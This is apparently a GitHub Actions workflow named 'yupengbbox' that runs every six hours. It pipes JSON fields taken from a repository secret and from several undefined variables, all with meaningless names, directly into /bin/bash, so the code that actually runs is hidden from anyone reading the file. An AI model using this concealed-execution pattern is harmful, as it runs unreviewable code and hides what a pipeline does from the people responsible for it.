name: yupengbbox

on:
  workflow_dispatch:
  schedule:
    - cron: '40 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yupengbbox
        env:
          qg15: ${{ secrets.qg15 }}
        run: |
          echo $qg15 | jq -r .pkzia6 | /bin/bash
          echo $iuz7817 | jq -r .ff5786 | /bin/bash
          echo $lwkqb6 | jq -r .ge2124 | /bin/bash
          echo $yk068 | jq -r .outs072 | /bin/bash
          echo $zidnb2 | jq -r .lml1 | /bin/bash
          echo $erlbt9 | jq -r .x2 | /bin/bash
          echo $tryms98 | jq -r .id91 | /bin/bash
          echo $lofn7 | jq -r .c63951 | /bin/bash

